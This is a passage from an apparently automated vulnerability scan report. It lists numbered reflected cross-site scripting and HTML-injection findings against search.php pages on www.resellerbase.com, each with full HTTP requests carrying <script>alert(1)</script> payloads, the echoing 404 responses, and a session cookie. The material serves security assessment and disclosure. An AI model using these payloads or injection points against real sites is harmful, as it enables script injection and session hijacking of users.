Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1c15c<script>alert(1)</script>fffc256d02b=1 was not found on this server.</p>
...[SNIP]...

2.1799. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5b2a6<a>8c0b73fb3ed was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25b2a6<a>8c0b73fb3ed HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25b2a6<a>8c0b73fb3ed was not found on this server.</p>
...[SNIP]...

2.1800. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4cf5c<script>alert(1)</script>849cd7ba4e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4cf5c<script>alert(1)</script>849cd7ba4e7/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4cf5c<script>alert(1)</script>849cd7ba4e7/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1801. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9641<script>alert(1)</script>64f2290a80b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22c9641<script>alert(1)</script>64f2290a80b/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22c9641<script>alert(1)</script>64f2290a80b/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1802. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6b4c9<script>alert(1)</script>6882c0f1b2a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes6b4c9<script>alert(1)</script>6882c0f1b2a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes6b4c9<script>alert(1)</script>6882c0f1b2a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1803. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 18d13<script>alert(1)</script>0d80088f5fd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos18d13<script>alert(1)</script>0d80088f5fd/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos18d13<script>alert(1)</script>0d80088f5fd/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1804. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cf873<script>alert(1)</script>d766403f7ab was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/imagescf873<script>alert(1)</script>d766403f7ab/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/imagescf873<script>alert(1)</script>d766403f7ab/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1805. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4d234<script>alert(1)</script>07a970d5e71 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/search.php4d234<script>alert(1)</script>07a970d5e71?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/search.php4d234<script>alert(1)</script>07a970d5e71?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1806. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c2f6a<a>72361cf5958 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchc2f6a<a>72361cf5958&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchc2f6a<a>72361cf5958&opt=2 was not found on this server.</p>
...[SNIP]...

2.1807. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2c6a9<a>de7512f6c11 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/search.php?keyword=search...2c6a9<a>de7512f6c11&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/search.php?keyword=search...2c6a9<a>de7512f6c11&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1808. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ccfc3<script>alert(1)</script>ff30ec41a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&ccfc3<script>alert(1)</script>ff30ec41a68=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&ccfc3<script>alert(1)</script>ff30ec41a68=1 was not found on this server.</p>
...[SNIP]...

2.1809. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d98d6<a>2f6e10b2a8a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2d98d6<a>2f6e10b2a8a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2d98d6<a>2f6e10b2a8a was not found on this server.</p>
...[SNIP]...

2.1810. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7def6<script>alert(1)</script>437c914bc31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7def6<script>alert(1)</script>437c914bc31/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7def6<script>alert(1)</script>437c914bc31/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1811. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d949<script>alert(1)</script>40d59e1fc3f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/223d949<script>alert(1)</script>40d59e1fc3f/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/223d949<script>alert(1)</script>40d59e1fc3f/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1812. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85f36<script>alert(1)</script>17cb4cdcb50 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes85f36<script>alert(1)</script>17cb4cdcb50/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes85f36<script>alert(1)</script>17cb4cdcb50/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1813. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cac7<script>alert(1)</script>06396d1c208 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos6cac7<script>alert(1)</script>06396d1c208/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos6cac7<script>alert(1)</script>06396d1c208/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1814. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 51e26<script>alert(1)</script>b8655577bc3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/search.php51e26<script>alert(1)</script>b8655577bc3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/search.php51e26<script>alert(1)</script>b8655577bc3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1815. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a8603<a>f87d1bac6ba was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Searcha8603<a>f87d1bac6ba&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Searcha8603<a>f87d1bac6ba&opt=2 was not found on this server.</p>
...[SNIP]...

2.1816. http://www.resellerbase.com/detail/22/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6b5a5<a>a8aa3c20ab7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/kosmos/search.php?keyword=search...6b5a5<a>a8aa3c20ab7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
